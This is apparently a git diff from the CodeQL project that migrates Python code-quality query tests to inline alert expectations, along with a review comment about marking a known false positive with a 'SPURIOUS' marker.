@@ -1 +1,2 @@ -Expressions/Regex/UnmatchableDollar.ql +query: Expressions/Regex/UnmatchableDollar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/Regex/test.py b/python/ql/test/query-tests/Expressions/Regex/test.py index 717663e335c5..c9aea2d9ceff 100644 --- a/python/ql/test/query-tests/Expressions/Regex/test.py +++ b/python/ql/test/query-tests/Expressions/Regex/test.py @@ -1,9 +1,9 @@ import re #Unmatchable caret -re.compile(b' ^abc') -re.compile(b"(?s) ^abc") -re.compile(b"\[^123]") +re.compile(b' ^abc') # $ Alert[py/regex/unmatchable-caret] +re.compile(b"(?s) ^abc") # $ Alert[py/regex/unmatchable-caret] +re.compile(b"\[^123]") # $ Alert[py/regex/unmatchable-caret] #Likely false positives for unmatchable caret re.compile(b"[^123]") @@ -14,21 +14,21 @@ re.compile(b"^diff (?:-r [0-9a-f]+ ){1,2}(.*)$") #Backspace escape -re.compile(br"[\b\t ]") # Should warn +re.compile(br"[\b\t ]") # Should warn # $ Alert[py/regex/backspace-escape] re.compile(br"E\d+\b.*") # Fine -re.compile(br"E\d+\b[ \b\t]") #Both +re.compile(br"E\d+\b[ \b\t]") #Both # $ Alert[py/regex/backspace-escape] #Missing part in named group -re.compile(br'(P[\w]+)') -re.compile(br'(_(P[\w]+)|)') +re.compile(br'(P[\w]+)') # $ Alert[py/regex/incomplete-special-group] +re.compile(br'(_(P[\w]+)|)') # $ Alert[py/regex/incomplete-special-group] #This is OK... re.compile(br'(?P\w+)') #Unmatchable dollar -re.compile(b"abc$ ") -re.compile(b"abc$ (?s)") -re.compile(b"\[$] ") +re.compile(b"abc$ ") # $ Alert[py/regex/unmatchable-dollar] +re.compile(b"abc$ (?s)") # $ Alert[py/regex/unmatchable-dollar] +re.compile(b"\[$] ") # $ Alert[py/regex/unmatchable-dollar] #Not unmatchable dollar re.match(b"[$] ", b"$ ") 
@@ -43,9 +43,9 @@ re.match(b"(a){00}b", b"b") #Duplicate character in set -re.compile(b"[AA]") -re.compile(b"[000]") -re.compile(b"[-0-9-]") +re.compile(b"[AA]") # $ Alert[py/regex/duplicate-in-character-class] +re.compile(b"[000]") # $ Alert[py/regex/duplicate-in-character-class] +re.compile(b"[-0-9-]") # $ Alert[py/regex/duplicate-in-character-class] #Possible false positives re.compile(b"[S\S]") @@ -76,8 +76,8 @@ #Not OK -re.compile(br'(?<=foo)^\w+') -re.compile(br'\w+$(?=foo)') +re.compile(br'(?<=foo)^\w+') # $ Alert[py/regex/unmatchable-caret] +re.compile(br'\w+$(?=foo)') # $ Alert[py/regex/unmatchable-dollar] #OK -- ODASA-ODASA-3968 @@ -134,7 +134,7 @@ \[ # [ (?P
[^]]+) # very permissive! \] # ] - """ + """ # $ Alert[py/regex/duplicate-in-character-class] # Compiled regular expression marking it as verbose ODASA_6786 = re.compile(VERBOSE_REGEX, re.VERBOSE) diff --git a/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref b/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref index ea8577e6f9fb..e26b890fde89 100644 --- a/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref +++ b/python/ql/test/query-tests/Expressions/callable/NonCallableCalled.qlref @@ -1 +1,2 @@ -Expressions/NonCallableCalled.ql \ No newline at end of file +query: Expressions/NonCallableCalled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/callable/test.py b/python/ql/test/query-tests/Expressions/callable/test.py index 5498fba72926..e37daba131fb 100644 --- a/python/ql/test/query-tests/Expressions/callable/test.py +++ b/python/ql/test/query-tests/Expressions/callable/test.py @@ -13,9 +13,9 @@ def __call__(self): def call_non_callable(arg): non = NonCallable() - non(arg) - ()() - []() + non(arg) # $ Alert + ()() # $ Alert + []() # $ Alert dont_know = MaybeCallable() dont_know() # Not a violation ok = IsCallable() @@ -23,7 +23,7 @@ def call_non_callable(arg): if hasattr(non, "__call__"): non(arg) # OK due to guard if hasattr(non, "__init__"): - non(arg) # Not OK due to wrong guard + non(arg) # Not OK due to wrong guard # $ Alert import six @@ -44,7 +44,7 @@ def foo(): raise NotImplemented() def bar(): - return NotImplemented() + return NotImplemented() # $ Alert # FP due to decorator @@ -60,7 +60,7 @@ def __init__(self, arg): @some_decorator @classmethod def new_instance(cls, new_arg): - return cls(new_arg) # TODO: FP + return cls(new_arg) # TODO: FP # $ Alert f1 = Foo(1) f2 = f1.new_instance(2) 
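Review bot: In the last hunk of `Expressions/callable/test.py`, the line `return cls(new_arg) # TODO: FP` gains a plain `# $ Alert`, which records a known false positive as if it were a wanted result. The inline-expectations format has a `SPURIOUS:` marker for exactly this case, so `return cls(new_arg) # $ SPURIOUS: Alert` keeps the test passing while leaving the false positive visible to whoever later fixes the query. The existing `# TODO: FP` comment could then be dropped, since the marker carries the same information in a machine-checked form.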
diff --git a/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref b/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref index fb7f75f9f615..e022932acda4 100644 --- a/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref +++ b/python/ql/test/query-tests/Expressions/comparisons/UselessComparisonTest.qlref @@ -1 +1,2 @@ -Expressions/Comparisons/UselessComparisonTest.ql \ No newline at end of file +query: Expressions/Comparisons/UselessComparisonTest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/comparisons/test.py b/python/ql/test/query-tests/Expressions/comparisons/test.py index aac73f4932eb..db0db60e2edf 100644 --- a/python/ql/test/query-tests/Expressions/comparisons/test.py +++ b/python/ql/test/query-tests/Expressions/comparisons/test.py @@ -3,16 +3,16 @@ def f(w, x, y, z): if x < 0 or z < 0: raise Exception() - if x >= 0: # Useless test due to x < 0 being false + if x >= 0: # Useless test due to x < 0 being false # $ Alert y += 1 - if z >= 0: # Useless test due to z < 0 being false + if z >= 0: # Useless test due to z < 0 being false # $ Alert y += 1 while w >= 0: if y < 10: z += 1 - if y == 15: # Useless test due to y < 10 being true + if y == 15: # Useless test due to y < 10 being true # $ Alert z += 1 - elif y > 7: # Useless test + elif y > 7: # Useless test # $ Alert y -= 1 if y < 10: y += 1 @@ -24,10 +24,10 @@ def f(w, x, y, z): def g(w, x, y, z): if w < x or y < z+2: raise Exception() - if w >= x: # Useless test due to w < x being false + if w >= x: # Useless test due to w < x being false # $ Alert pass if cond: - if z > y-2: # Useless test due to y < z+2 being false + if z > y-2: # Useless test due to y < z+2 being false # $ Alert y += 1 else: if z >= y-2: # Not a useless test. 
@@ -46,7 +46,7 @@ def validate_series(start, end): def medium1(x, y): if x + 1000000000000000 > y + 1000000000000000: return - if x > y: # Redundant + if x > y: # Redundant # $ Alert pass def medium2(x, y): @@ -70,19 +70,19 @@ def big2(x, y): def odasa6782_v1(protocol): if protocol < 0: protocol = HIGHEST_PROTOCOL - elif not 0 <= protocol: + elif not 0 <= protocol: # $ Alert raise ValueError() def odasa6782_v2(protocol): if protocol < 0: protocol = HIGHEST_PROTOCOL - elif not 0 <= protocol <= HIGHEST_PROTOCOL: + elif not 0 <= protocol <= HIGHEST_PROTOCOL: # $ Alert raise ValueError() def odasa6782_v3(protocol): if protocol < 0: protocol = HIGHEST_PROTOCOL - elif 0 <= protocol <= HIGHEST_PROTOCOL: + elif 0 <= protocol <= HIGHEST_PROTOCOL: # $ Alert pass else: raise ValueError() diff --git a/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref b/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref index 73123cf76281..df847ee2b1bb 100644 --- a/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref +++ b/python/ql/test/query-tests/Expressions/eq/IncorrectComparisonUsingIs.qlref @@ -1 +1,2 @@ -Expressions/IncorrectComparisonUsingIs.ql +query: Expressions/IncorrectComparisonUsingIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref b/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref index 13c08534293c..a62a6a40f60d 100644 --- a/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref +++ b/python/ql/test/query-tests/Expressions/eq/NonPortableComparisonUsingIs.qlref @@ -1 +1,2 @@ -Expressions/NonPortableComparisonUsingIs.ql +query: Expressions/NonPortableComparisonUsingIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Expressions/eq/expressions_test.py b/python/ql/test/query-tests/Expressions/eq/expressions_test.py index 3489bf3a1a94..632616583c39 100644 --- a/python/ql/test/query-tests/Expressions/eq/expressions_test.py +++ b/python/ql/test/query-tests/Expressions/eq/expressions_test.py @@ -43,12 +43,12 @@ def meth(self): #Using 'is' when should be using '==' s = "Hello " + "World" -if "Hello World" is s: +if "Hello World" is s: # $ Alert[py/comparison-using-is] print ("OK") #This is OK in CPython, but may not be portable s = str(7) -if "7" is s: +if "7" is s: # $ Alert[py/comparison-using-is-non-portable] print ("OK") #And some data flow diff --git a/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref b/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref index 0e2ab115eeec..5b5160d860d5 100644 --- a/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref +++ b/python/ql/test/query-tests/Expressions/general/CompareConstants.qlref @@ -1 +1,2 @@ -Expressions/CompareConstants.ql +query: Expressions/CompareConstants.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref index 4bc0ec69fc04..ad4cbb7600e8 100644 --- a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref +++ b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValues.qlref @@ -1 +1,2 @@ -Expressions/CompareIdenticalValues.ql +query: Expressions/CompareIdenticalValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref index f19a0dee4364..48f4d302afba 100644 
--- a/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref
+++ b/python/ql/test/query-tests/Expressions/general/CompareIdenticalValuesMissingSelf.qlref
@@ -1 +1,2 @@
-Expressions/CompareIdenticalValuesMissingSelf.ql
\ No newline at end of file
+query: Expressions/CompareIdenticalValuesMissingSelf.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref b/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref
index 71df405e72c1..b52c39ed26d2 100644
--- a/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref
+++ b/python/ql/test/query-tests/Expressions/general/ContainsNonContainer.qlref
@@ -1 +1,2 @@
-Expressions/ContainsNonContainer.ql
+query: Expressions/ContainsNonContainer.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref b/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref
index a1bb71098829..23123f187490 100644
--- a/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref
+++ b/python/ql/test/query-tests/Expressions/general/DuplicateKeyInDictionaryLiteral.qlref
@@ -1 +1,2 @@
-Expressions/DuplicateKeyInDictionaryLiteral.ql
\ No newline at end of file
+query: Expressions/DuplicateKeyInDictionaryLiteral.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref b/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref
index 8d9699258e25..026a3f5bbc2f 100644
--- a/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref
+++ b/python/ql/test/query-tests/Expressions/general/EqualsNone.qlref
@@ -1 +1,2 @@
-Expressions/EqualsNone.ql
\ No newline at end of file
+query: Expressions/EqualsNone.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref b/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref
index 83e92584ef27..fd322b848dca 100644
--- a/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref
+++ b/python/ql/test/query-tests/Expressions/general/ExpectedMappingForFormatString.qlref
@@ -1 +1,2 @@
-Expressions/ExpectedMappingForFormatString.ql
\ No newline at end of file
+query: Expressions/ExpectedMappingForFormatString.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref b/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref
index 932f1a3d366d..451bd74eee0e 100644
--- a/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref
+++ b/python/ql/test/query-tests/Expressions/general/ExplicitCallToDel.qlref
@@ -1 +1,2 @@
-Expressions/ExplicitCallToDel.ql
\ No newline at end of file
+query: Expressions/ExplicitCallToDel.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref b/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref
index ee53e3674999..f30fd92870f0 100644
--- a/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref
+++ b/python/ql/test/query-tests/Expressions/general/HashedButNoHash.qlref
@@ -1 +1,2 @@
-Expressions/HashedButNoHash.ql
\ No newline at end of file
+query: Expressions/HashedButNoHash.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref b/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref
index 49b3873f83ce..9141c5e49a65 100644
--- a/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref
+++ b/python/ql/test/query-tests/Expressions/general/UnnecessaryLambda.qlref
@@ -1 +1,2 @@ -Expressions/UnnecessaryLambda.ql \ No newline at end of file +query: Expressions/UnnecessaryLambda.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref b/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref index 3cb459229e4a..8e50b947401e 100644 --- a/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref +++ b/python/ql/test/query-tests/Expressions/general/UnsupportedFormatCharacter.qlref @@ -1 +1,2 @@ -Expressions/UnsupportedFormatCharacter.ql \ No newline at end of file +query: Expressions/UnsupportedFormatCharacter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref b/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref index 0d127e1b618b..744334a6aeb1 100644 --- a/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref +++ b/python/ql/test/query-tests/Expressions/general/WrongNumberArgumentsForFormat.qlref @@ -1 +1,2 @@ -Expressions/WrongNumberArgumentsForFormat.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsForFormat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/general/compare.py b/python/ql/test/query-tests/Expressions/general/compare.py index 141b5e6a0286..c48e06f4b1ca 100644 --- a/python/ql/test/query-tests/Expressions/general/compare.py +++ b/python/ql/test/query-tests/Expressions/general/compare.py @@ -5,12 +5,12 @@ a.x == b.x #Same variables -a == a -a.x == a.x +a == a # $ Alert[py/comparison-of-identical-expressions] +a.x == a.x # $ Alert[py/comparison-of-identical-expressions] #Compare constants -1 == 1 -1 == 2 +1 == 1 # $ Alert[py/comparison-of-constants] +1 == 2 # $ Alert[py/comparison-of-constants] #Maybe missing self class X(object): 
@@ -19,7 +19,7 @@ def __init__(self, x): self.x = x def missing_self(self, x): - if x == x: + if x == x: # $ Alert[py/comparison-missing-self] print ("Yes") #Compare constants in assert -- ok diff --git a/python/ql/test/query-tests/Expressions/general/expressions_test.py b/python/ql/test/query-tests/Expressions/general/expressions_test.py index 5e07b58e2041..71e0d1ba7cf0 100644 --- a/python/ql/test/query-tests/Expressions/general/expressions_test.py +++ b/python/ql/test/query-tests/Expressions/general/expressions_test.py @@ -1,16 +1,16 @@ #encoding: utf-8 def dup_key(): - return { 1: -1, + return { 1: -1, # $ Alert[py/duplicate-key-dict-literal] 1: -2, - u'a' : u'A', + u'a' : u'A', # $ Alert[py/duplicate-key-dict-literal] u'a' : u'B' } def simple_func(*args, **kwrgs): pass #Unnecessary lambdas -lambda arg0, arg1: simple_func(arg0, arg1) -lambda arg0, *arg1: simple_func(arg0, *arg1) -lambda arg0, **arg1: simple_func(arg0, **arg1) +lambda arg0, arg1: simple_func(arg0, arg1) # $ Alert[py/unnecessary-lambda] +lambda arg0, *arg1: simple_func(arg0, *arg1) # $ Alert[py/unnecessary-lambda] +lambda arg0, **arg1: simple_func(arg0, **arg1) # $ Alert[py/unnecessary-lambda] # these lambdas are_ necessary lambda arg0, arg1=1: simple_func(arg0, arg1) lambda arg0, arg1: simple_func(arg0, *arg1) @@ -34,12 +34,12 @@ def call_non_callable(arg): dont_know() # Not a violation #Explicit call to __del__ -x.__del__() +x.__del__() # $ Alert[py/explicit-call-to-delete] #Unhashable object def func(): mapping = dict(); unhash = list() - return mapping[unhash] + return mapping[unhash] # $ Alert[py/hash-unhashable-value] #Using 'is' when should be using '==' s = "Hello " + "World" @@ -86,9 +86,9 @@ def next(self): def non_container(): seq = XIter() - if 1 in seq: + if 1 in seq: # $ Alert[py/member-test-non-container] pass - if 1 not in seq: + if 1 not in seq: # $ Alert[py/member-test-non-container] pass #Container inheriting from builtin 
@@ -112,7 +112,7 @@ def is_container(): #Equals none def x(arg): - return arg == None + return arg == None # $ Alert[py/test-equals-none] class NotMyDict(object): @@ -130,7 +130,7 @@ def __del__(self): # This is permitted and required. Test.__del__(self) # This is a violation. - self.__del__() + self.__del__() # $ Alert[py/explicit-call-to-delete] # This is an alternate syntax for the super() call, and hence OK. super(SubTest, self).__del__() # This is the Python 3 spelling of the same. @@ -138,15 +138,15 @@ def __del__(self): #Some more lambdas #Unnecessary lambdas -lambda arg0: len(arg0) -lambda arg0: XIter.next(arg0) +lambda arg0: len(arg0) # $ Alert[py/unnecessary-lambda] +lambda arg0: XIter.next(arg0) # $ Alert[py/unnecessary-lambda] class UL(object): def f(self, x): pass def g(self): - return lambda x: self.f(x) + return lambda x: self.f(x) # $ Alert[py/unnecessary-lambda] # these lambdas are necessary lambda arg0: XIter.next(arg0, arg1) diff --git a/python/ql/test/query-tests/Expressions/general/str_fmt_test.py b/python/ql/test/query-tests/Expressions/general/str_fmt_test.py index e941b842c319..f7441ef9a8ad 100644 --- a/python/ql/test/query-tests/Expressions/general/str_fmt_test.py +++ b/python/ql/test/query-tests/Expressions/general/str_fmt_test.py @@ -2,16 +2,16 @@ def expected_mapping_for_fmt_string(): x = [ u'list', u'not', u'mapping' ] - print (u"%(name)s" % x) + print (u"%(name)s" % x) # $ Alert[py/percent-format/not-mapping] def unsupported_format_char(arg): - print (u"%Z" % arg) + print (u"%Z" % arg) # $ Alert[py/percent-format/unsupported-character] def wrong_arg_count_format(arg): - print(u"%s %s" % (arg, arg, 0)) + print(u"%s %s" % (arg, arg, 0)) # $ Alert[py/percent-format/wrong-arguments] format = u"%hd" args = (1, u'foo') - print(format % args) + print(format % args) # $ Alert[py/percent-format/wrong-arguments] def ok(): 
diff --git a/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref b/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref index c305fd129f8b..7159e5c79721 100644 --- a/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref +++ b/python/ql/test/query-tests/Expressions/strings/UnintentionalImplicitStringConcatenation.qlref @@ -1 +1,2 @@ -Expressions/UnintentionalImplicitStringConcatenation.ql \ No newline at end of file +query: Expressions/UnintentionalImplicitStringConcatenation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Expressions/strings/test.py b/python/ql/test/query-tests/Expressions/strings/test.py index 15b3c9216e33..1767a2d109be 100644 --- a/python/ql/test/query-tests/Expressions/strings/test.py +++ b/python/ql/test/query-tests/Expressions/strings/test.py @@ -15,13 +15,13 @@ def test(): error1 = [ "foo", "/usr/local" - "/usr/bin" + "/usr/bin" # $ Alert ] error2 = [ "foo" + "bar", "/usr/local" - "/usr/bin" + "/usr/bin" # $ Alert ] #Examples from documentation @@ -31,9 +31,9 @@ def unclear(): return [ "first part of long string" - " and the second part", + " and the second part", # $ Alert "/usr/local" - "/usr/bin" + "/usr/bin" # $ Alert ] def clarified(): diff --git a/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref b/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref index c3beeaede04b..e1ed0c122bea 100644 --- a/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref +++ b/python/ql/test/query-tests/Expressions/super/CallToSuperWrongClass.qlref @@ -1 +1,2 @@ -Expressions/CallToSuperWrongClass.ql \ No newline at end of file +query: Expressions/CallToSuperWrongClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Expressions/super/test.py b/python/ql/test/query-tests/Expressions/super/test.py index e2e667cd25d7..947bc3814b2a 100644 --- a/python/ql/test/query-tests/Expressions/super/test.py +++ b/python/ql/test/query-tests/Expressions/super/test.py @@ -7,7 +7,7 @@ class MyDict(dict): class NotMyDict(object): def f(self): - super(MyDict, self).f() + super(MyDict, self).f() # $ Alert #Splitting PY2 = sys.version_info[0] == 2 diff --git a/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref b/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref index 8c4044e8feeb..e8937358e32f 100644 --- a/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref +++ b/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref @@ -1 +1 @@ -Functions/ModificationOfParameterWithDefault.ql +query: Functions/ModificationOfParameterWithDefault.ql diff --git a/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref b/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref index c38b8d1f7619..3043411c1ce4 100644 --- a/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref +++ b/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref @@ -1 +1,2 @@ -Functions/DeprecatedSliceMethod.ql \ No newline at end of file +query: Functions/DeprecatedSliceMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref b/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref index a23550c48650..df13334dcbf5 100644 --- a/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref +++ b/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref 
@@ -1 +1,2 @@
-Functions/ExplicitReturnInInit.ql
\ No newline at end of file
+query: Functions/ExplicitReturnInInit.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref b/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref
index a3df140ff1e6..2662a7ca03a3 100644
--- a/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref
+++ b/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref
@@ -1 +1,2 @@
-Functions/InitIsGenerator.ql
\ No newline at end of file
+query: Functions/InitIsGenerator.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref b/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref
index 3d0965f7b115..14655b261d42 100644
--- a/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref
+++ b/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref
@@ -1 +1 @@
-Functions/IterReturnsNonIterator.ql
+query: Functions/IterReturnsNonIterator.ql
diff --git a/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref b/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref
index 601501aac303..90dba842c0e7 100644
--- a/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref
+++ b/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref
@@ -1 +1,2 @@
-Functions/OverlyComplexDelMethod.ql
+query: Functions/OverlyComplexDelMethod.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref
index a306477b3b48..5470a05e0e41 100644
--- a/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref
+++ b/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref @@ -1 +1,2 @@ -Functions/SignatureOverriddenMethod.ql +query: Functions/SignatureOverriddenMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref b/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref index bc1b29b6c0d0..ab188ef5bc28 100644 --- a/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref +++ b/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref @@ -1 +1,2 @@ -Functions/SignatureSpecialMethods.ql \ No newline at end of file +query: Functions/SignatureSpecialMethods.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py b/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py index 47a2933ad6ef..9024b13aa786 100644 --- a/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py +++ b/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py @@ -1,7 +1,7 @@ class ExplicitReturnInInit(object): def __init__(self): - return self + return self # $ Alert[py/explicit-return-in-init] # These are OK class ExplicitReturnNoneInInit(object): @@ -29,7 +29,7 @@ def __init__(self): class InitIsGenerator(object): - def __init__(self): + def __init__(self): # $ Alert[py/init-method-is-generator] yield self # OK as it returns result of a call to super().__init__() @@ -99,4 +99,4 @@ def __init__(self, b): p = procedure_implicit_none() else: p = not_ok - return p() + return p() # $ Alert[py/explicit-return-in-init] diff --git a/python/ql/test/query-tests/Functions/general/functions_test.py b/python/ql/test/query-tests/Functions/general/functions_test.py index 741599abd5b0..a306ef8ccc82 100644 --- a/python/ql/test/query-tests/Functions/general/functions_test.py 
+++ b/python/ql/test/query-tests/Functions/general/functions_test.py @@ -92,13 +92,13 @@ def ok_to_ignore(): class DeprecatedSliceMethods(object): - def __getslice__(self, start, stop): + def __getslice__(self, start, stop): # $ Alert[py/deprecated-slice-method] pass - def __setslice__(self, start, stop, value): + def __setslice__(self, start, stop, value): # $ Alert[py/deprecated-slice-method] pass - def __delslice__(self, start, stop): + def __delslice__(self, start, stop): # $ Alert[py/deprecated-slice-method] pass diff --git a/python/ql/test/query-tests/Functions/general/om_test.py b/python/ql/test/query-tests/Functions/general/om_test.py index 959ed6bfe348..edaa81bd0628 100644 --- a/python/ql/test/query-tests/Functions/general/om_test.py +++ b/python/ql/test/query-tests/Functions/general/om_test.py @@ -29,10 +29,10 @@ def ok1(self, arg1, arg2 = 2): def ok2(self, arg1, arg2 = 2, arg3 = 3): return arg1, arg2, arg3 - def grossly_wrong1(self, arg1): + def grossly_wrong1(self, arg1): # $ Alert[py/inheritance/signature-mismatch] return arg1 - def grossly_wrong2(self, arg1, arg2, arg3): + def grossly_wrong2(self, arg1, arg2, arg3): # $ Alert[py/inheritance/signature-mismatch] return arg1, arg2, arg3 def strictly_wrong1(self, arg1): @@ -56,19 +56,19 @@ def __str__(self): class WrongSpecials(object): - def __div__(self, x, y): + def __div__(self, x, y): # $ Alert[py/special-method-wrong-signature] return self, x, y - def __mul__(self): + def __mul__(self): # $ Alert[py/special-method-wrong-signature] return self - def __neg__(self, other): + def __neg__(self, other): # $ Alert[py/special-method-wrong-signature] return self, other - def __exit__(self, arg0, arg1): + def __exit__(self, arg0, arg1): # $ Alert[py/special-method-wrong-signature] return arg0 == arg1 - def __repr__(): + def __repr__(): # $ Alert[py/special-method-wrong-signature] return "" def __add__(self, other="Unused default"): 
